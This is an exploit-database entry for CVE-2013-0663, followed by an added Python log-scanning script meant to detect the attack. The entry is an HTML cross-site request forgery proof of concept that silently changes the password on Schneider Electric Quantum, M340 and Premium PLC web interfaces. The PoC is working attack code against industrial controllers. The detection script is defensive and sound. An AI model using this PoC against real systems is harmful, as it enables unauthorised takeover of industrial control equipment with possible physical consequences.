# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
# Date: 2018-05-12
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Tested on: Windows
# CVE: CVE-2013-0663
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
# Category: webapps

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
  <table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
    <tr>
      <td class="inputCell" width="200">
        <div align="left">
          <h5>Name:</h5>
          <script language="javascript" type="text/javascript">
          <!--//
          paramLang();
          switch(getLanguage()) {
            default:
              document.write("Username :");
              break;
          }
          //-->
          </script>
        </div>
      </td>
      <td class="inputCell" width="190">
        <input type="text" name="user" size="20">
      </td>
    </tr>
    <tr>
      <td class="inputCell" width="200">
        <div align="left">&
          <h5>Pass:</h5>
          <script language="javascript" type="text/javascript">
          <!--//
          switch(getLanguage()) {
            default:
              document.write("New password :");
              break;
          }
          //-->
          </script>
        </div>
      </td>
      <td class="inputCell" width="190">
        <input type="password" name="passwd" size="20">
      </td>
    </tr>
    <tr>
      <td class="inputCell" width="200">
        <div align="left">
          <h5>Verify Pass:</h5>
          <script language="javascript" type="text/javascript">
          <!--//
          switch(getLanguage()) {
            default:
              document.write("Confirm password :");
              break;
          }
          //-->
          </script>
        </div>
      </td>
      <td class="inputCell" width="190">
        <input type="password" name="cnfpasswd" size="20">
      </td>
    </tr>
  </table>
  <br>
  <div align="center">
    <script language="javascript" type="text/javascript">
    <!--//
    switch(getLanguage()) {
      default:
        document.write('<input type="submit" name="subhttppwd" value="Change Password">');
        break;
    }
    //-->
    </script>
    <input type="submit" name="subhttppwd" value="Change Password">
  </div>
</form>
<br>
</td>
</tr>
<tr>
<td align="center">
<br>
</body>
</html>
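
For defenders, the following is an added example (not part of the original PoC or any vendor tooling) that flags password-change requests to the path and parameter names used in the form above when the Referer points to a different host. The log line layout, the addresses and the host names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names are taken from the form in the PoC above.
TARGET_PATH = "/secure/embedded/builtin"
PASSWORD_PARAMS = {"user", "passwd", "cnfpasswd"}

# Assumed proxy log layout: client host "METHOD url PROTO" status "referer"
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<host>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<referer>[^"]*)"$'
)

# Constructed sample lines; 192.0.2.10 stands in for the PLC web interface.
QUERY = "user=a&passwd=x&cnfpasswd=x&subhttppwd=Change+Password"
SAMPLE_LOG = [
    f'10.0.5.21 192.0.2.10 "GET {TARGET_PATH}?{QUERY} HTTP/1.1" 200 "http://wiki.example/page.html"',
    f'10.0.5.30 192.0.2.10 "GET {TARGET_PATH}?{QUERY} HTTP/1.1" 200 "http://192.0.2.10/"',
    '10.0.5.30 192.0.2.10 "GET /index.htm HTTP/1.1" 200 "-"',
    f'10.0.5.44 192.0.2.10 "GET {TARGET_PATH}?user=a&passwd=x&cnfpasswd=x HTTP/1.1" 200 "-"',
]

def classify(line):
    """Return None for unrelated lines, else a verdict for a password-change request."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    if url.path != TARGET_PATH:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if not PASSWORD_PARAMS.issubset(params):
        return None
    ref_host = urlsplit(m["referer"]).hostname
    if ref_host is None:
        return "no-referer"      # origin unknown: review manually
    if ref_host != m["host"].lower():
        return "cross-origin"    # submitted from a page on another host
    return "same-origin"

def scan(lines):
    """Return (client, verdict) for every request that was not same-origin."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict in ("cross-origin", "no-referer"):
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The Referer header can be stripped or absent, so a "no-referer" hit is a prompt for review rather than proof of forgery.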